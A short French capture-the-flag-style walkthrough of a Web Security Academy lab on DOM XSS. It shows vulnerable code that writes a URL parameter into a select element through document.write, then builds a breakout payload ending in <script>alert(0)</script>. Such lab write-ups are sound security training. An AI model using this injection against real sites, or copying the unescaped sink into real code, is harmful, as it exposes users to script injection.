XSS DOM avec document.write à l’intérieur d’un select

DOM XSS in document.write sink using source location.search inside a select element

Lab: DOM XSS in document.write sink using source location.search inside a select element | Web Security AcademyWebSecAcademy

Le code suivant génère dynamiquement un menu déroulant <select> avec différentes villes, et sélectionne celle qui est transmise dans le paramètre storeId de l’URL :

var stores = ["London", "Paris", "Milan"];
var store = (new URLSearchParams(window.location.search)).get("storeId");

document.write('<select name="storeId">');

if (store) {
  document.write('<option selected>' + store + "</option>");
}

for (var i = 0; i < stores.length; i++) {
  if (stores[i] === store) {
    continue;
  }
  document.write("<option>" + stores[i] + "</option>");
}

document.write("</select>");

Exemple avec le paramètre :

product?productId=2&storeId=Jordan

Cela ajoute une nouvelle option dans la liste déroulante.

En fermant manuellement la balise <option> :

</option>Jordan

on peut également fermer le <select> :

</option></select>Jordan

Injection finale permettant d’exécuter du JavaScript :

</option></select><script>alert(0)</script>

Mis à jour il y a 4 mois

hashtagDOM XSS in document.write sink using source location.search inside a select element

DOM XSS in document.write sink using source location.search inside a select element